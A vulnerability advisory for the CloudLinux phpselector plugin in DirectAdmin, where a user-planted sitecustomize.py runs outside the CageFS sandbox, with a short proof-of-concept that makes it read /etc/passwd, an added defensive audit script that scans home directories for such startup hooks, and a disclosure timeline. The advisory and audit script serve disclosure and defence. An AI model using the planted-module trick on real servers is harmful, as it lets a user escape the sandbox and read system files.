Vulnerability

Affected software: lvemanager versions below 5.0.8.1-1, lve-utils versions below 3.1.10.1-1, lve-stats versions below 2.9.4.1-1

CloudLinux phpselector for DirectAdmin is written in Python. When the phpselector script is executed by DirectAdmin, it tries to load modules from /home/USER/.local/lib/python2.7/site-packages/ before entering CageFS. Python imports a module named sitecustomize automatically at interpreter startup, so a user who creates a sitecustomize.py file in that directory can have custom commands executed outside CageFS.

Exploit

$ mkdir -p /home/USER/.local/lib/python2.7/site-packages/
$ echo -e "import os\nos.system('/usr/bin/cat /etc/passwd > /home/USER/output')" > /home/USER/.local/lib/python2.7/site-packages/sitecustomize.py

Now go to the DirectAdmin phpselector plugin and click "Save".

Solution

Update lvemanager to 5.0.8.1-1 or later, lve-utils to 3.1.10.1-1 or later, lve-stats to 2.9.4.1-1 or later.
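
To audit a server for files planted in this load path, the following added example (not part of the original advisory and not CloudLinux code) lists startup hooks in every per-user site-packages directory. It goes beyond sitecustomize.py to usercustomize.py and executable .pth lines, which Python's site module also runs at startup. It assumes Python 3 for the audit script and homes under /home; all function names are hypothetical.

```python
import glob
import os
import sys
import tempfile

# Startup hooks that the `site` module runs automatically from a user site dir.
HOOK_MODULES = ("sitecustomize.py", "usercustomize.py")


def pth_exec_lines(path):
    """Return the lines of a .pth file that `site` would exec (they start with 'import')."""
    try:
        with open(path, errors="replace") as fh:
            return [ln.strip() for ln in fh if ln.startswith(("import ", "import\t"))]
    except OSError:
        return []


def find_user_site_hooks(home_root="/home"):
    """List (path, reason) for startup code in HOME/.local/lib/pythonX.Y/site-packages."""
    findings = []
    # The trailing separator makes glob return directories only.
    pattern = os.path.join(home_root, "*", ".local", "lib", "python*", "site-packages", "")
    for site_dir in sorted(glob.glob(pattern)):
        for name in sorted(os.listdir(site_dir)):
            full = os.path.join(site_dir, name)
            if name in HOOK_MODULES:
                findings.append((full, "startup module"))
            elif name.endswith(".pth") and pth_exec_lines(full):
                findings.append((full, "executable .pth line"))
    return findings


def build_sample_tree(root):
    """Constructed sample: one home with a sitecustomize.py, one clean home."""
    bad = os.path.join(root, "alice", ".local", "lib", "python2.7", "site-packages")
    ok = os.path.join(root, "bob", ".local", "lib", "python2.7", "site-packages")
    os.makedirs(bad)
    os.makedirs(ok)
    with open(os.path.join(bad, "sitecustomize.py"), "w") as fh:
        fh.write("# constructed placeholder\n")
    with open(os.path.join(ok, "paths.pth"), "w") as fh:
        fh.write("/opt/constructed/lib\n")  # plain path entry, not executed
    return root


if __name__ == "__main__":
    root = sys.argv[1] if len(sys.argv) > 1 else build_sample_tree(tempfile.mkdtemp())
    for path, reason in find_user_site_hooks(root):
        print(f"{reason}: {path}")
```

Run it with the home root as the only argument (for example /home) to scan a real server; with no argument it scans the constructed sample tree.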

Timeline

  • 2019-08-12 - Vulnerability reported to vendor.
  • 2019-08-12 - Response from vendor, task WEB-1552 assigned.
  • 2019-10-09 - Production version 5.1.2-1 of lvemanager, 3.1.10.1-1 of lve-utils, 2.9.4.1-1 of lve-stats released with the WEB-1552 vulnerability fixed.